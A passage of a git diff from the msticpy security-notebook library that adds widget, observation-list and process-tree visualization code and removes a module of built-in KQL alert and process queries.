+        """Filter the alert list by substring."""
+        if change is not None and "new" in change:
+            self._source_list.options = sorted(
+                {
+                    i
+                    for i in self.src_items
+                    if str(change["new"]).lower() in str(i).lower()
+                }
+            )
+
+    # pylint: disable=not-an-iterable
+    def _on_btn_add(self, button):
+        del button
+        selected_set = set(self._select_list.options)
+        for selected in self._source_list.value:
+            if self._src_dict:
+                selected_set.add(self._src_dict[selected])
+            else:
+                selected_set.add(selected)
+        self._select_list.options = sorted(list(selected_set))
+
+    def _on_btn_add_all(self, button):
+        del button
+        self._select_list.options = sorted(list(set(self._source_list.options)))
+
+    def _on_btn_del(self, button):
+        del button
+        selected_set = set(self._select_list.options)
+        # save the current index
+        cur_index = max(self._select_list.index)
+        if selected_set:
+            for selected in self._select_list.value:
+                if self._src_dict:
+                    selected_set.remove(self._src_dict[selected])
+                else:
+                    selected_set.remove(selected)
+            self._select_list.options = sorted(list(selected_set))
+        if not self._select_list.options:
+            return
+        # try to set the index to the next item in the list
+        if cur_index < len(self._select_list.options):
+            next_item = cur_index or 0
+            self._select_list.index = tuple([next_item])
+        else:
+            last_item = max(len(self._select_list.options) - 1, 0)
+            self._select_list.index = tuple([last_item])
+
+    # pylint: enable=not-an-iterable
+
+    def _on_btn_del_all(self, button):
+        del button
+        self._select_list.options = []
diff --git a/msticpy/nbtools/observationlist.py b/msticpy/nbtools/observationlist.py
new file mode 100644
index 000000000..b690fde8b
--- /dev/null
+++ b/msticpy/nbtools/observationlist.py
@@ -0,0 +1,187 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Observation summary collector."""
+from collections import OrderedDict
+from typing import Mapping, Any, Optional, List, Dict
+
+import attr
+from attr import Factory
+from IPython.display import display, Markdown
+
+from .._version import VERSION
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+# Query definition
+@attr.s(auto_attribs=True)
+class Observation:
+    """
+    Observation definition.
+
+    Notes
+    -----
+    caption : str
+        The title and index of the observation. Must
+        be unique in the observation set.
+    description : Optional[str]
+        Text description of the observation.
+        (default is None)
+    data : Any
+        The data to be stored for the observation (e.g.
+        a pandas DataFrame). The object should implement
+        a useable __repr__ to display correctly.
+    data_type : Optional[str]
+        The data type of the `data` property
+    link : Optional[str]
+        Link (usually a document-local link) to the
+        originating section of the notebook.
+        (default is None)
+    score : int
+        The risk score associated with the observation.
+        (default is 0)
+    tags : List[str]
+        Optional list of tags.
+    additional_properties Dict[str, Any]
+        Additional properties not covered
+        by core properties.
+
+    """
+
+    caption: str
+    data: Any
+    description: Optional[str] = None
+    data_type: Optional[str] = None
+    link: Optional[str] = None
+    score: int = 0
+    tags: List[str] = Factory(list)
+    additional_properties: Dict[str, Any] = Factory(dict)
+
+    @classmethod
+    def required_fields(cls) -> List[str]:
+        """
+        Return required fields for Observation instance.
+
+        Returns
+        -------
+        List[str]
+            List of field names.
+
+        """
+        return ["caption", "data"]
+
+    @classmethod
+    def all_fields(cls) -> List[str]:
+        """
+        Return all fields of Observation class.
+
+        Returns
+        -------
+        List[str]
+            List of all field names.
+
+        """
+        return [field.name for field in attr.fields(cls)]
+
+    def display(self):
+        """Display the observation."""
+        display(Markdown(f"### {self.caption}"))
+        if self.description:
+            display(Markdown(self.description))
+        display(Markdown(f"Score: {self.score}"))
+        if self.link:
+            display(Markdown(f"[Go to details](#{self.link})"))
+        if self.tags:
+            display(Markdown(f'tags: {", ".join(self.tags)}'))
+        display(self.data)
+        if self.additional_properties:
+            display(Markdown("### Additional Properties"))
+            # pylint: disable=no-member
+            for key, val in self.additional_properties.items():
+                display(Markdown(f"**{key}**: {val}"))
+            # pylint: enable=no-member
+
+
+class Observations:
+    """Class to collect and display investigation observations."""
+
+    def __init__(self, observationlist: "Observations" = None):
+        """
+        Create an observation list.
+
+        Parameters
+        ----------
+        observationlist : Observations, optional
+            Initialize from an existing Observations list
+            (the default is None)
+
+        """
+        self.observation_list: Dict[str, Observation] = OrderedDict()
+        if observationlist is not None:
+            self.observation_list.update(observationlist.observations)
+
+    @property
+    def observations(self) -> Mapping[str, Observation]:
+        """
+        Return the current list of Observations.
+
+        Returns
+        -------
+        Mapping[str, Observation]
+            The current ordered dictionary of Observations
+
+        """
+        return self.observation_list
+
+    def display_observations(self):
+        """Display the current observations using IPython.display."""
+        for observation in self.observation_list.values():
+            display(observation)
+
+    def add_observation(self, observation: Observation = None, **kwargs):
+        """
+        Add an observation.
+
+        Add an observation as an Observation instance or as a
+        set of keyword parameters (see Observation class for
+        acceptable values). Any keyword parameters that are not
+        properties of Observation will be stored in the
+        Observation.additional_properties dictionary
+
+        Parameters
+        ----------
+        observation : Observation
+            An observation instance.
+
+        Other Parameters
+        ----------------
+        kwargs : str, Any
+            List of key value pairs of the property names
+            and values of the Observation to be stored.
+
+        """
+        if observation is not None:
+            self.observation_list[observation.caption] = observation
+        else:
+            req_fields = set(Observation.required_fields())
+            missing_fields = req_fields.difference(kwargs.keys())
+            if missing_fields:
+                raise ValueError(
+                    "The following fields are required",
+                    f"in an Observation: {missing_fields}",
+                )
+
+            core_fields = {
+                k: v for k, v in kwargs.items() if k in Observation.all_fields()
+            }
+            new_observation = Observation(**core_fields)
+            addl_fields = {
+                k: v for k, v in kwargs.items() if k not in Observation.all_fields()
+            }
+            # pylint: disable=no-member
+            new_observation.additional_properties.update(addl_fields)
+            self.observation_list[new_observation.caption] = new_observation
diff --git a/msticpy/nbtools/process_tree.py b/msticpy/nbtools/process_tree.py
new file mode 100644
index 000000000..1e83ce324
--- /dev/null
+++ b/msticpy/nbtools/process_tree.py
@@ -0,0 +1,641 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Process Tree Visualization."""
+from collections import namedtuple
+from typing import Optional, Tuple, Union
+
+import numpy as np
+import pandas as pd
+from bokeh.io import output_notebook, reset_output, show
+
+# pylint: enable=no-name-in-module
+from bokeh.layouts import column, row
+from bokeh.models import (
+    BoxSelectTool,
+    ColorBar,
+    ColumnDataSource,
+    CustomJS,
+    HoverTool,
+    LayoutDOM,
+    RangeTool,
+)
+from bokeh.models.widgets import DataTable, DateFormatter, TableColumn
+
+# pylint: disable=no-name-in-module
+from bokeh.palettes import viridis
+from bokeh.plotting import figure
+from bokeh.transform import dodge, factor_cmap, linear_cmap
+
+from .._version import VERSION
+from ..common.utility import check_kwargs
+from ..sectools.proc_tree_builder import build_process_tree, infer_schema
+from ..sectools.proc_tree_schema import ProcessTreeSchemaException, ProcSchema
+from ..sectools.proc_tree_schema import ColNames as Col
+
+# pylint: disable=unused-import
+from ..sectools.process_tree_utils import (  # noqa F401
+    get_ancestors,
+    get_children,
+    get_descendents,
+    get_parent,
+    get_process,
+    get_process_key,
+    get_root,
+    get_root_tree,
+    get_roots,
+    get_siblings,
+    get_summary_info,
+    get_tree_depth,
+)
+
+# pylint: enable=unused-import
+
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+_DEFAULT_KWARGS = ["height", "title", "width", "hide_legend", "pid_fmt"]
+
+
+def build_and_show_process_tree(
+    data: pd.DataFrame,
+    schema: ProcSchema = None,
+    output_var: str = None,
+    legend_col: str = None,
+    **kwargs,
+) -> Tuple[figure, LayoutDOM]:
+    """
+    Build process tree from data and plot a tree.
+
+    Parameters
+    ----------
+    data : pd.DataFrame
+        Window process creation or Linux Auditd events
+    schema : ProcSchema
+        The data schema to use for the data set, by default None
+        (if None the schema is inferred)
+    output_var : str, optional
+        Output variable for selected items in the tree,
+        by default None
+    legend_col : str, optional
+        The column used to color the tree items, by default None
+    kwargs : Dict[str, Any]
+        Additional arguments passed to plot_process_tree
+
+    Other Parameters
+    ----------------
+    height : int, optional
+        The height of the plot figure
+        (the default is 700)
+    width : int, optional
+        The width of the plot figure (the default is 900)
+    title : str, optional
+        Title to display (the default is None)
+    hide_legend : bool, optional
+        Hide the legend box, even if legend_col is specified.
+    pid_fmt : str, optional
+        Display Process ID as 'dec' (decimal) or 'hex' (hexadecimal),
+        default is 'hex'.
+
+    Returns
+    -------
+    Tuple[figure, LayoutDOM]:
+        figure - The main bokeh.plotting.figure
+        Layout - Bokeh layout structure.
+
+    Notes
+    -----
+    For full parameter set for process tree display see the
+    help for plot_process_tree.
+
+    See Also
+    --------
+    plot_process_tree
+
+    """
+    # Check if this table already seems to have the proc_tree metadata
+    missing_cols = _check_proc_tree_schema(data)
+    if missing_cols:
+        data = build_process_tree(procs=data, schema=schema)
+
+    return plot_process_tree(
+        data, schema, output_var=output_var, legend_col=legend_col, **kwargs
+    )
+
+
+# pylint: disable=too-many-locals, too-many-statements
+def plot_process_tree(  # noqa: MC0001
+    data: pd.DataFrame,
+    schema: ProcSchema = None,
+    output_var: str = None,
+    legend_col: str = None,
+    show_table: bool = False,
+    **kwargs,
+) -> Tuple[figure, LayoutDOM]:
+    """
+    Plot a Process Tree Visualization.
+
+    Parameters
+    ----------
+    data : pd.DataFrame
+        DataFrame containing one or more Process Trees
+    schema : ProcSchema, optional
+        The data schema to use for the data set, by default None
+        (if None the schema is inferred)
+    output_var : str, optional
+        Output variable for selected items in the tree,
+        by default None
+    legend_col : str, optional
+        The column used to color the tree items, by default None
+    show_table: bool
+        Set to True to show a data table, by default False.
+
+    Other Parameters
+    ----------------
+    height : int, optional
+        The height of the plot figure
+        (the default is 700)
+    width : int, optional
+        The width of the plot figure (the default is 900)
+    title : str, optional
+        Title to display (the default is None)
+    hide_legend : bool, optional
+        Hide the legend box, even if legend_col is specified.
+    pid_fmt : str, optional
+        Display Process ID as 'dec' (decimal) or 'hex' (hexadecimal),
+        default is 'hex'.
+
+    Returns
+    -------
+    Tuple[figure, LayoutDOM]:
+        figure - The main bokeh.plotting.figure
+        Layout - Bokeh layout structure.
+
+    Raises
+    ------
+    ProcessTreeSchemaException
+        If the data set schema is not valid for the plot.
+
+    Notes
+    -----
+    The `output_var` variable will be overwritten with any selected
+    values.
+
+    """
+    check_kwargs(kwargs, _DEFAULT_KWARGS)
+    reset_output()
+    output_notebook()
+
+    plot_height: int = kwargs.pop("height", 700)
+    plot_width: int = kwargs.pop("width", 900)
+    title: str = kwargs.pop("title", "ProcessTree")
+    hide_legend = kwargs.pop("hide_legend", False)
+    pid_fmt = kwargs.pop("pid_fmt", "hex")
+
+    proc_data, schema, levels, n_rows = _pre_process_tree(data, schema, pid_fmt=pid_fmt)
+    if schema is None:
+        raise ProcessTreeSchemaException("Could not infer data schema from data set.")
+
+    source = ColumnDataSource(data=proc_data)
+    # Get legend/color bar map
+    fill_map, color_bar = _create_fill_map(source, legend_col)
+
+    max_level = max(levels) + 3
+    min_level = min(levels)
+
+    if color_bar:
+        title += " (color bar = {legend_col})"
+    visible_range = int(plot_height / 35)
+    y_start_range = (n_rows - visible_range, n_rows + 1)
+    b_plot = figure(
+        title=title,
+        plot_width=plot_width,
+        plot_height=plot_height,
+        x_range=(min_level, max_level),
+        y_range=y_start_range,
+        tools=["reset", "save", "tap", "ywheel_pan"],
+        toolbar_location="above",
+        active_scroll="ywheel_pan",
+    )
+
+    hover = HoverTool(
+        tooltips=_get_tool_tips(schema),
+        formatters={f"@{schema.time_stamp}": "datetime"},
+    )
+    b_plot.add_tools(hover)
+
+    # dodge to align rectangle with grid
+    rect_x = dodge("Level", 1.75, range=b_plot.x_range)
+    rect_plot_params = dict(
+        width=3.5, height=0.95, source=source, fill_alpha=0.4, fill_color=fill_map
+    )
+
+    if color_bar:
+        b_plot.add_layout(color_bar, "right")
+    elif legend_col:
+        rect_plot_params["legend_field"] = legend_col
+    rect_plot = b_plot.rect(x=rect_x, y="Row", **rect_plot_params)
+    if legend_col and not color_bar:
+        b_plot.legend.title = legend_col
+        b_plot.legend.label_text_font_size = "7pt"
+    if hide_legend:
+        b_plot.legend.visible = False
+
+    text_props = {"source": source, "text_align": "left", "text_baseline": "middle"}
+
+    def x_dodge(x_offset):
+        return dodge("Level", x_offset, range=b_plot.x_range)
+
+    def y_dodge(y_offset):
+        return dodge("Row", y_offset, range=b_plot.y_range)
+
+    b_plot.text(
+        x=x_dodge(0.1),
+        y=y_dodge(-0.2),
+        text="__cmd_line$$",
+        text_font_size="7pt",
+        **text_props,
+    )
+    b_plot.text(
+        x=x_dodge(0.1),
+        y=y_dodge(0.25),
+        text="__proc_name$$",
+        text_font_size="8pt",
+        **text_props,
+    )
+    b_plot.text(
+        x=x_dodge(2.2),
+        y=y_dodge(0.25),
+        text="__proc_id$$",
+        text_font_size="8pt",
+        **text_props,
+    )
+
+    # Plot options
+    _set_plot_option_defaults(b_plot)
+    b_plot.xaxis.ticker = sorted(levels)
+    b_plot.xgrid.ticker = sorted(levels)
+    b_plot.hover.renderers = [rect_plot]  # only hover element boxes
+
+    # Selection callback
+    if output_var is not None:
+        get_selected = _create_js_callback(source, output_var)
+        b_plot.js_on_event("tap", get_selected)
+        box_select = BoxSelectTool(callback=get_selected)
+        b_plot.add_tools(box_select)
+
+    range_tool = _create_vert_range_tool(
+        data=source,
+        min_y=0,
+        max_y=n_rows,
+        plot_range=b_plot.y_range,
+        width=90,
+        height=plot_height,
+        x_col="Level",
+        y_col="Row",
+        fill_map=fill_map,
+    )
+    plot_elems = row(b_plot, range_tool)
+    if show_table:
+        data_table = _create_data_table(source, schema, legend_col)
+        plot_elems = column(plot_elems, data_table)
+    show(plot_elems)
+    return b_plot, plot_elems
+
+
+# pylint: enable=too-many-locals, too-many-statements
+
+
+TreeResult = namedtuple("TreeResult", "proc_tree, schema, levels, n_rows")
+
+
+def _pre_process_tree(
+    proc_tree: pd.DataFrame, schema: ProcSchema = None, pid_fmt: str = "hex"
+):
+    """Extract dimensions and formatted values from proc_tree."""
+    # Check if this table already seems to have the proc_tree metadata
+    missing_cols = _check_proc_tree_schema(proc_tree)
+    if missing_cols:
+        proc_tree = build_process_tree(procs=proc_tree, schema=schema)
+
+    if schema is None:
+        schema = infer_schema(proc_tree)
+    if schema is None:
+        return TreeResult(None, None, None, None)
+
+    _validate_plot_schema(proc_tree, schema)
+
+    proc_tree = proc_tree.sort_values("path", ascending=True).reset_index()
+    n_rows = len(proc_tree)
+    proc_tree["Row"] = proc_tree.index
+    proc_tree["Row"] = n_rows - proc_tree["Row"]
+    proc_tree["Level"] = proc_tree["path"].str.count("/") + 1
+
+    levels = proc_tree["Level"].unique()
+
+    proc_tree[schema.process_name] = proc_tree[schema.process_name].fillna("unknown")
+    proc_tree["__proc_name$$"] = proc_tree.apply(
+        lambda x: x[schema.process_name].split(schema.path_separator)[-1], axis=1
+    )
+    proc_tree[schema.process_id] = proc_tree[schema.process_id].fillna("unknown")
+    proc_tree["__proc_id$$"] = proc_tree[schema.process_id].apply(
+        _pid_fmt, args=(pid_fmt,)
+    )
+
+    # trim long commandlines
+    max_cmd_len = 500 // len(levels)
+    proc_tree[schema.cmd_line] = proc_tree[schema.cmd_line].astype(str)
+    long_cmd = proc_tree[schema.cmd_line].str.len() > max_cmd_len
+    proc_tree.loc[long_cmd, "__cmd_line$$"] = (
+        proc_tree[long_cmd][schema.cmd_line].str[:max_cmd_len] + "..."
+    )
+    # replace missing cmdlines
+    proc_tree.loc[~long_cmd, "__cmd_line$$"] = proc_tree[~long_cmd][
+        schema.cmd_line
+    ].fillna("cmdline unknown")
+    return TreeResult(proc_tree=proc_tree, schema=schema, levels=levels, n_rows=n_rows)
+
+
+def _pid_fmt(pid, pid_fmt):
+    if pid_fmt == "hex":
+        return f"PID: {pid}" if str(pid).startswith("0x") else f"PID: 0x{int(pid):x}"
+    return (
+        f"PID: {pid}" if not str(pid).startswith("0x") else f"PID: {int(pid, base=16)}"
+    )
+
+
+def _validate_plot_schema(proc_tree: pd.DataFrame, schema):
+    """Validate that we have the required columns."""
+    required_cols = set(
+        ["path", schema.cmd_line, schema.process_name, schema.process_id]
+    )
+    proc_cols = set(proc_tree.columns)
+    missing = required_cols - proc_cols
+    if missing:
+        raise ProcessTreeSchemaException(
+            f"Required columns not found in data set: {','.join(missing)}"
+        )
+
+
+def _set_plot_option_defaults(b_plot):
+    """Set default plot options."""
+    b_plot.outline_line_color = None
+    b_plot.grid.grid_line_color = "navy"
+    b_plot.axis.axis_line_color = None
+    b_plot.axis.major_tick_line_color = "navy"
+    b_plot.xaxis.visible = False
+    b_plot.yaxis.visible = False
+    b_plot.xgrid.visible = True
+    b_plot.ygrid.visible = False
+    b_plot.xgrid.minor_grid_line_color = "navy"
+    b_plot.xgrid.minor_grid_line_alpha = 0.1
+    b_plot.xgrid.grid_line_color = "navy"
+    b_plot.xgrid.grid_line_alpha = 0.1
+    b_plot.axis.major_label_standoff = 0
+
+
+def _get_tool_tips(schema: ProcSchema):
+    """Return tool tip formatter."""
+    return [
+        ("Process", f"@{schema.process_name}"),
+        ("PID", f"@{schema.process_id}"),
+        ("CmdLine", f"@{schema.cmd_line}"),
+        ("SubjUser", f"@{schema.user_name}"),
+        ("SubjLgnId", f"@{schema.logon_id}"),
+        ("TgtLgnId", f"@{schema.target_logon_id}"),
+        ("Time", f"@{schema.time_stamp}{{%F %T.%3N}}"),
+    ]
+
+
+def _create_js_callback(source: ColumnDataSource, result_var: str) -> CustomJS:
+    """Create and return CustomJS callback to set Python variable."""
+    ret_var_js = """
+        // get data source from Callback args
+        var inds = source.selected.indices;
+        var output = [];
+        for (var i = 0; i < inds.length; i++) {
+            output.push(source.data[itemkey][inds[i]])
+        }
+        var out_str = JSON.stringify(output);
+        var py_str = `${output_var} = ${out_str}`;
+        console.log(py_str);
+        IPython.notebook.kernel.execute(py_str);
+    """
+    return CustomJS(
+        args=dict(source=source, itemkey=Col.proc_key, output_var=result_var),
+        code=ret_var_js,
+    )
+
+
+def _create_fill_map(
+    source: ColumnDataSource, source_column: str = None
+) -> Tuple[Union[factor_cmap, linear_cmap], Optional[ColorBar]]:
+    """Create factor map or linear map based on `source_column`."""
+    fill_map = "navy"
+    color_bar = None
+    if source_column is None or source_column not in source.data:
+        return fill_map, color_bar
+
+    col_kind = source.data[source_column].dtype.kind
+    if col_kind in ["b", "O"]:
+        s_values = set(source.data[source_column])
+        if np.nan in s_values:
+            s_values.remove(np.nan)
+        values = list(s_values)
+        fill_map = factor_cmap(
+            source_column, palette=viridis(max(3, len(values))), factors=values
+        )
+    elif col_kind in ["i", "u", "f", "M"]:
+        values = [val for val in source.data[source_column] if not np.isnan(val)]
+        fill_map = linear_cmap(
+            field_name=source_column,
+            palette=viridis(256),
+            low=np.min(values),
+            high=np.max(values),
+        )
+        color_bar = ColorBar(
+            color_mapper=fill_map["transform"], width=8, location=(0, 0)  # type: ignore
+        )
+    return fill_map, color_bar
+
+
+# pylint: disable=too-many-arguments
+def _create_vert_range_tool(
+    data, min_y, max_y, plot_range, width, height, x_col, y_col, fill_map="navy"
+):
+    """Return vertical range too for plot."""
+    rng_select = figure(
+        plot_width=width,
+        plot_height=height,
+        y_range=(min_y - 1, max_y + 1),
+        toolbar_location=None,
+    )
+
+    x_dodge = dodge(x_col, -0.5)
+    rng_select.rect(
+        x=x_dodge,
+        y=y_col,
+        width=1.2,
+        height=0.8,
+        source=data,
+        fill_alpha=0.6,
+        fill_color=fill_map,
+    )
+
+    rng_select.xaxis.visible = False
+    rng_select.yaxis.visible = False
+
+    range_tool = RangeTool(y_range=plot_range)
+    range_tool.overlay.fill_color = "navy"
+    range_tool.overlay.fill_alpha = 0.2
+    rng_select.ygrid.grid_line_color = None
+    rng_select.xgrid.grid_line_color = None
+    rng_select.add_tools(range_tool)
+    rng_select.toolbar.active_multi = range_tool
+    return rng_select
+
+
+# pylint: enable=too-many-arguments
+
+
+def _create_data_table(
+    source: ColumnDataSource, schema: ProcSchema, legend_col: str = None
+):
+    """Return DataTable widget for source."""
+    column_names = [
+        schema.user_name,
+        schema.user_id,
+        schema.logon_id,
+        schema.process_id,
+        schema.process_name,
+        schema.cmd_line,
+        schema.parent_id,
+        schema.parent_name,
+        schema.target_logon_id,
+    ]
+
+    if legend_col and legend_col not in column_names:
+        column_names.append(legend_col)
+
+    date_fmt = "%F %T"
+    columns = [
+        TableColumn(
+            field=schema.time_stamp,
+            title=schema.time_stamp,
+            formatter=DateFormatter(format=date_fmt),
+        )
+    ]
+    columns2 = [
+        TableColumn(field=col, title=col)
+        for col in column_names
+        if col in source.column_names
+    ]
+
+    return DataTable(source=source, columns=columns + columns2, width=950, height=150)
+
+
+def _check_proc_tree_schema(data):
+    """Return true if expected process tree columns are present."""
+    if data.index.name != Col.proc_key:
+        return {Col.proc_key}
+    expected_cols = set(
+        [
+            Col.parent_key,
+            "IsRoot",
+            "IsLeaf",
+            "IsBranch",
+            "path",
+            # "parent_index",
+        ]
+    )
+    return expected_cols - set(data.columns)
+
+
+# pylint: disable=too-few-public-methods
+@pd.api.extensions.register_dataframe_accessor("mp_process_tree")
+class ProcessTreeAccessor:
+    """Pandas api extension for Process Tree."""
+
+    def __init__(self, pandas_obj):
+        """Instantiate pandas extension class."""
+        self._df = pandas_obj
+
+    def plot(self, **kwargs) -> Tuple[figure, LayoutDOM]:
+        """
+        Build and plot a process tree.
+
+        Parameters
+        ----------
+        schema : ProcSchema, optional
+            The data schema to use for the data set, by default None
+            (if None the schema is inferred)
+        output_var : str, optional
+            Output variable for selected items in the tree,
+            by default None
+        legend_col : str, optional
+            The column used to color the tree items, by default None
+        show_table: bool
+            Set to True to show a data table, by default False.
+
+        Other Parameters
+        ----------------
+        height : int, optional
+            The height of the plot figure
+            (the default is 700)
+        width : int, optional
+            The width of the plot figure (the default is 900)
+        title : str, optional
+            Title to display (the default is None)
+        hide_legend : bool, optional
+            Hide the legend box, even if legend_col is specified.
+        pid_fmt : str, optional
+            Display Process ID as 'dec' (decimal) or 'hex' (hexadecimal),
+            default is 'hex'.
+
+        Returns
+        -------
+        Tuple[figure, LayoutDOM]:
+            figure - The main bokeh.plotting.figure
+            Layout - Bokeh layout structure.
+
+        """
+        return build_and_show_process_tree(data=self._df, **kwargs)
+
+    def build(self, schema: ProcSchema = None, **kwargs) -> pd.DataFrame:
+        """
+        Build process trees from the process events.
+
+        Parameters
+        ----------
+        procs : pd.DataFrame
+            Process events (Windows 4688 or Linux Auditd)
+        schema : ProcSchema, optional
+            The column schema to use, by default None
+            If None, then the schema is inferred
+        show_summary : bool
+            Shows summary of the built tree, default is False. : bool
+        debug : bool
+            If True produces extra debugging output,
+            by default False
+
+        Returns
+        -------
+        pd.DataFrame
+            Process tree dataframe.
+
+        Notes
+        -----
+        It is not necessary to call this before `plot`. The process
+        tree is built automatically. This is only needed if you want
+        to return the processed tree data as a DataFrame
+
+        """
+        return build_process_tree(
+            procs=self._df,
+            schema=schema,
+            show_summary=kwargs.get("show_summary", kwargs.get("show_progress", False)),
+            debug=kwargs.get("debug", False),
+        )
diff --git a/msticpy/nbtools/query_builtin_queries.py b/msticpy/nbtools/query_builtin_queries.py
deleted file mode 100644
index 77d00b23f..000000000
--- a/msticpy/nbtools/query_builtin_queries.py
+++ /dev/null
@@ -1,421 +0,0 @@
-# -------------------------------------------------------------------------
-# Copyright (c) Microsoft Corporation. All rights reserved.
-# Licensed under the MIT License. See License.txt in the project root for
-# license information.
-# --------------------------------------------------------------------------
-"""default queries module ."""
-from . query_defns import KqlQuery, DataFamily, DataEnvironment
-
-# Module level variable that holds dictionary of queries
-# indexed by name
-# pylint: disable=C0103
-query_definitions = dict()
-# pylint: enable=C0103
-
-
-KNOWN_PARAM_NAMES = ['table', 'query_project', 'start', 'end',
-                     'system_alert_id', 'subscription_filter',
-                     'host_filter_eq', 'host_filter_neq', 'host_name',
-                     'account_name', 'process_name', 'process_id',
-                     'logon_session_id', 'path_separator', 'commandline',
-                     'source_ip_list', 'add_query_items']
-
-
-def _add_query(kql_query):
-    query_definitions[kql_query.name] = kql_query
-
-# ------------------------------------------------------------------------
-# Do Not edit above this line
-# ------------------------------------------------------------------------
-
-
-# Predefined queries
-_add_query(KqlQuery(name='list_alerts_counts',
-                    query='''
-{table}
-{query_project}
-| where TimeGenerated >= datetime({start})
-| where TimeGenerated <= datetime({end})
-| summarize alertCount=count(), firstAlert=min(TimeGenerated),
-    lastAlert=max(TimeGenerated) by AlertName
-| order by alertCount desc
-{add_query_items}
-''',
-                    description='Retrieves summary of current alerts',
-                    data_source='security_alert',
-                    data_families=[DataFamily.SecurityAlert],
-                    data_environments=[DataEnvironment.LogAnalytics],
-                    optional_params=['add_query_items']))
-
-_add_query(KqlQuery(name='list_alerts',
-                    query='''
-{table}
-{query_project}
-| where TimeGenerated >= datetime({start})
-| where TimeGenerated <= datetime({end})
-| extend extendedProps = parse_json(ExtendedProperties)
-| extend CompromisedEntity = tostring(extendedProps['Compromised Host'])
-| project-away extendedProps
-{add_query_items}
-''',
-                    description='Retrieves list of current alerts',
-                    data_source='security_alert',
-                    data_families=[DataFamily.SecurityAlert],
-                    data_environments=[DataEnvironment.LogAnalytics],
-                    optional_params=['add_query_items']))
-
-_add_query(KqlQuery(name='get_alert',
-                    query='''
-{table}
-{query_project}
-| where TimeGenerated >= datetime({start})
-| where TimeGenerated <= datetime({end})
-| extend extendedProps = parse_json(ExtendedProperties)
-| extend CompromisedEntity = tostring(extendedProps['Compromised Host'])
-| project-away extendedProps
-| where SystemAlertId == \'{system_alert_id}\'
-{add_query_items}
-''',
-                    description='Retrieves an alert by alert Id',
-                    data_source='security_alert',
-                    data_families=[DataFamily.SecurityAlert],
-                    data_environments=[DataEnvironment.LogAnalytics],
-                    optional_params=['add_query_items']))
-
-_add_query(KqlQuery(name='list_related_alerts',
-                    query='''
-let src_host = \'{host_name}\';
-let src_acct = \'{account_name}\';
-let src_proc = \'{process_name}\';
-{table}
-{query_project}
-| where {subscription_filter}
-| where TimeGenerated >= datetime({start})
-| where TimeGenerated <= datetime({end})
-| extend Computer = src_host
-| extend src_hostname = tostring(split(src_host, '.')[0])
-| extend src_accountname = iif(src_acct contains '\\\\',
-                               tostring(split(src_acct, '\\\\')[-1]),
-                               tostring(split(src_acct, '@')[0]))
-| extend src_procname = tostring(split(src_proc, \'{path_separator}\')[-1])
-| extend host_match = iif(isnotempty(src_host) and
-    (Entities has src_hostname or Entities has src_host
-     or ExtendedProperties has src_hostname
-     or ExtendedProperties has src_host), true, false)
-| extend acct_match = iif(isnotempty(src_acct)
-     and (Entities has src_accountname or Entities has src_acct
-     or ExtendedProperties has src_accountname
-     or ExtendedProperties has src_acct), true, false)
-| extend proc_match = iif(isnotempty(src_acct)
-     and (Entities has src_procname or Entities has src_proc
-     or ExtendedProperties has src_procname
-     or ExtendedProperties has src_proc), true, false)
-| where host_match or acct_match or proc_match
-{add_query_items}
-''',
-                    description='Retrieves list of alerts with a common host, acount or process',
-                    data_source='security_alert',
-                    data_families=[DataFamily.SecurityAlert],
-                    data_environments=[DataEnvironment.LogAnalytics],
-                    optional_params=['process_name', 'account_name', 'add_query_items']))
-
-_add_query(KqlQuery(name='list_related_ip_alerts',
-                    query='''
-let src_ips = \'{source_ip_list}\';
-let src_ips_arr = split(src_ips, ',');
-let IP_table = toscalar(range idx from 0 to array_length(src_ips_arr) - 1 step 1
-| extend ip = trim(@'\\s*', tostring(src_ips_arr[idx]))
-| project ip
-| distinct ip
-| summarize makeset(ip) );
-let ip_extract = materialize(
-{table}
-{query_project}
-| where {subscription_filter}
-| where TimeGenerated >= datetime({start})
-| where TimeGenerated <= datetime({end})
-| project SystemAlertId, ExtendedProperties, Entities
-| extend source_ips_str = extract("\\"Source IPs\\": \\"([^\\"]+)\\"", 1, ExtendedProperties)
-| extend source_ips_1 = iif(isnotempty(source_ips_str), split(source_ips_str, ','), dynamic([]))
-| extend source_ips_2 = extract_all("\\"Address\\": \\"([^\\"]+)\\"", dynamic([1]), Entities)
-| mvexpand alert_ip_1 = source_ips_1 to typeof(string), alert_ip_2 = source_ips_2 to typeof(string)
-| where isnotempty(alert_ip_1) or isnotempty(alert_ip_2)
-| where alert_ip_1 in (IP_table) or alert_ip_2 in (IP_table)
-| extend matching_ips = case(isnotempty(alert_ip_1) and isnotempty(alert_ip_2), strcat(alert_ip_1, ',', alert_ip_2),
-                             isnotempty(alert_ip_1), alert_ip_1,
-                             isnotempty(alert_ip_2), alert_ip_2,
-                             '')
-| extend MatchingIps = split(matching_ips, ',')
-| project-away source_ips_str, source_ips_1, source_ips_2, alert_ip_1, alert_ip_2, matching_ips
-);
-{table}
-{query_project}
-| where {subscription_filter}
-| where TimeGenerated >= datetime({start})
-| where TimeGenerated <= datetime({end})
-| join (ip_extract) on SystemAlertId
-{add_query_items}
-''',
-                    description='Retrieves list of alerts with a common IP Address',
-                    data_source='security_alert',
-                    data_families=[DataFamily.SecurityAlert],
-                    data_environments=[DataEnvironment.LogAnalytics],
-                    optional_params=['add_query_items']))
-
-_add_query(KqlQuery(name='get_process_tree',
-                    query='''
-let start = datetime({start});
-let end = datetime({end});
-let sourceProcessId = \'{process_id}\';
-let sourceLogonId = \'{logon_session_id}\';
-let sourceProcess =
-materialize(
-    {table}
-    {query_project}
-    | where {subscription_filter}
-    | where {host_filter_eq}
-    | where TimeGenerated >= start
-    | where TimeGenerated <= end
-    | where SubjectLogonId == sourceLogonId
-    | where NewProcessId == sourceProcessId
-    | where NewProcessName =~ \'{process_name}\'
-    | extend NodeRole = 'source', Level = 0
-    | top 1 by TimeCreatedUtc desc nulls last);
-let sourceTimeCreatedUtc = toscalar(sourceProcess | project TimeCreatedUtc);
-let sourceParentProcessId = toscalar(sourceProcess | project ProcessId);
-let system_session_id = toscalar(sourceProcess
-    | extend sys_session = iff(NewProcessName contains '/', '-1', '0x3e7')
-    | project sys_session );
